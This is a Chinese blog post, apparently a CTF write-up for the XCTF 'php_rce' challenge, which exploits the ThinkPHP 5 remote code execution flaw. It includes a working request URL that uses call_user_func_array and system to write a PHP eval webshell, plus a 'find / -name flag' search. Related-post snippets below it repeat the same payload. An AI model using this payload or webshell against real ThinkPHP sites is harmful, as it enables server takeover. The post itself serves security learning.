XCTF_Web_003_php_rce

最新推荐文章于 2024-11-11 08:41:51 发布

o130bbd7

最新推荐文章于 2024-11-11 08:41:51 发布

阅读量105

点赞数

分类专栏： XCTF_Writeup 文章标签： web安全

本文链接：https://blog.csdn.net/weixin_43243191/article/details/120333668

版权

XCTF_Writeup 专栏收录该内容

4 篇文章 0 订阅

订阅专栏

Writeup

看题目，应该是ThinkPHP的RCE漏洞
在这里插入图片描述
ThinkPHP的V5版本未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法

// 获取控制器名
$controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));

不知怎么利用就google搜一下POC

搜索flag
find / -name flag
在这里插入图片描述
cat 查看

Writeup2

写入webshell

http://111.200.241.244:57672/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%3C?php%20eval($_POST[shell]);%20?%3E%27%20%3E%20shell.php

查看网站目录，已经将shell.php写进去了
在这里插入图片描述
上蚁剑

浏览一下

FLAG

flag{thinkphp5_rce}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

o130bbd7

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

攻防世界web高手进阶php_rce,php_rce 攻防世界xctf web

weixin_39603613的博客

03-09

289

php_rce首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参于是构造payloadhttp://111.198.29.45:30600/index.php?s=index/\think\App/i...

攻防世界web高手进阶php_rce,XCTF攻防世界_Web进阶区001

weixin_39599654的博客

03-09

776

XCTF攻防世界_Web进阶区001XCTF攻防世界_Web进阶区001XCTF_Web_高手进阶区baby_webTraining-WWW-RobotsWeb_php_unserializephp_rcebaby_web(1)按照提示，初始界面想到index.php，再次请求index.php后仍是1.php(被重定向了)。F12打开开发者模式查看“网络”模块，查看返回包发现确实有index.p...

参与评论您还未登录，请先登录后发表或查看评论

php_rce 攻防世界xctf web

weixin_45689999的博客

03-02

736

php_rce 首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478 var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参于是构造payload http://111.198.29.45:30600/index.php?s=index/\think\A...

XCTF-WEB进阶区php_rce

Lorezon的博客

03-15

320

打开题目出现网页：在网上查了TinkPHP的漏洞复现，得到payload如下： ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...

XCTF Web 高手区003: php_rce

立志成为最会敲代码的dancer，最会locking的程序猿

04-02

572

题目： WP：看到题目就知道是thinkphp的远程执行漏洞这里大家可以看一下这位大佬是末初呀~的博客，他对thinkphp的相关知识讲的很棒我们直接上payload： http://111.198.29.45:45747/index.php? s=index/think\app/invokefunction&function=call_user_func_array&v...

Web_php_include-xctf

qq_43660551的博客

07-03

1016

RCE-PHP

XCTF web php_rce (thinkphp)

H4ppyD0g的博客

08-28

327

thinkphp5.0和5.1由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本。测试是否可以getshell ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=ls 成功返回信息，确定存在漏洞接着查询有flag的文件 ?s=index/think\app/invoke

XCTF WEB 高手进阶区 php_rce

qq_30076719的博客

11-04

304

这一题，看到rec，第一时间想到命令执行，打开链接，提示ThinkPHP V5 ,V5就是第五个版本啦，据百度所知，ThinkPHP是一款国内流行的开源PHP框架，2018年被爆出存在可能的远程代码执行漏洞，受影响的版本包括5.0和5.1版本，那么很合理啦，这一题考的就是这个漏洞的利用，百度可得poc s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=

【XCTF高手进阶区】web3_php_rce writeup

Mitchell_Donovan的博客

01-21

415

web3_php_rce 原题链接 key:ThinkPHP5远程代码执行漏洞 ①环境打开后页面长这样式的???? ②题目是php_rce，不妨先来了解一下什么是rce???? 知识补充： 1. 什么是rce(远程代码执行漏洞) 远程命令/代码执行漏洞，简称rce漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。 2. 漏洞产生的根本原因服务器没有针对执行函数做过滤，导致在没有指定绝对路径的情

XCTF系列 // Web | php_rce & Web_python_template_injection

qq_45805420的博客

07-26

275

前言这两题涉及到的知识点有，ThinkPHP 的远程代码执行漏洞以及 flask的 SSTI 漏洞（服务端模板注入）。　　由于水平有限，关于以上内容的了解均只到表面，具体漏洞原理尚未看明白，详细分析只好以后再补，在这里先参照网上的 writeup，照猫画虎，略微整理分析一下解题思路与流程。 1` php_rce ThinkPHP 是一个轻量级国产 PHP 开发框架，它可以支持 windows/Unix/Linux 等服务器环境。在 ThinkPHP 5 中出现了由于变量覆盖而引起的 RCE（远程命令

CTF-WEB入门DOC-2019版1

08-03

5. PHP漏洞：学习PHP基础和相关漏洞，如变量覆盖、文件包含、反序列化、RCE等。 6. Python漏洞：研究Flask SSTI、pickle反序列化等。 7. XXE：理解XXE漏洞原理，通过xxe-lab实践。 8. Java漏洞：掌握Java反序列化...

攻防世界 web高手进阶区 8分题 love_math

闵行小鱼塘

10-03

1139

继续ctf的旅程，开始攻防世界web高手进阶区的8分题，本文是love_math的writeup

XCTF篇：Web (高手进阶区) 3 ThinkPHP5.0.20远程命令执行漏洞复现

小明师傅博客

06-21

1311

3.php_rce 感觉是让我找ThinkPHP V5的漏洞？？但我连ThinkPHP V5是什么都不知道== 对我这小白一点也不友好搜索发现框架和cms的区别框架就是提供一个快速bai敏捷开发的平台,里面一些常du用的功zhi能,都封装好,然后你要按照框架的语法和文件结dao构来进行网站的建设,就好比是搭建了一个房子外面的框架都设计好,你需要做的是修改里面的东西. 而cms是将整个房间,不仅框架搭建好了.里面的各个房间也给你布置好,可以不经过任何加工直接可以入住. 两者的优缺点是: 框架相对比较灵

2024年网络安全（黑客技术）三个月自学手册

csbDD的博客

11-06

2121

网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的，技术上面其实有很大的重叠性，抛开甲乙方、岗位名称、岗位职责等因素来看，作为学技术的，也根据以往我们给学员推荐就业和入职情况来看，只要好好掌握以下几种技术（网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言）中的2到3个，都可以较好的胜任工作需求。

【网络安全 | 漏洞挖掘】隐藏的 DOS 技术

最新发布

等风来

11-11

142

我调查了这些参数的用途，发现它们被传递给了第三方服务，且该服务的文档说明这些参数是安全的。你可以试试这样做：前往https://ash-speed.hetzner.com/并找到一个测试文件（大小大约1到10 GB），如果服务器等待URL请求完成，你可以通过大量此类请求来淹没服务器，从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表，结果网站在60秒后超时，并出现了显著的延迟。在我的案例中，这导致了客户网站的DOS攻击，问题被发现并快速修复，甚至在我报告漏洞之前。

网络安全（黑客技术）2024年三个月自学手册

2401_85026116的博客

11-07

1211

数据安全、信息安全、网络安全区别与联系

2401_88326591的博客

11-07

889

信息安全是保护信息系统免受意外或故意的非授权泄漏、传递、修改或破坏。

shodan 【2】（泷羽sec）

m0_68984471的博客

11-08

847

shodan的使用方法

标题：网络安全：数字时代的守护盾

运维人生

11-08

560

网络安全是指保护网络系统中的硬件、软件及数据免受恶意攻击、破坏、泄露或非法使用的状态和能力。系统安全：确保服务器、路由器、交换机等网络基础设施的安全运行，防止被非法入侵或篡改。数据安全：保护存储在网络中的数据不被未经授权的访问、泄露、修改或删除。应用安全：确保网络应用程序（如网站、移动APP）没有安全漏洞，能够抵御恶意软件的攻击。身份与访问管理：通过认证、授权和审计机制，确保只有合法用户才能访问特定资源。网络安全意识：提高用户对网络威胁的认识，教育他们如何识别和防范钓鱼邮件、恶意链接等常见攻击手段。

pure_color xctf

07-16

pure_color xctf是一个CTF比赛平台，致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域，包括但不限于...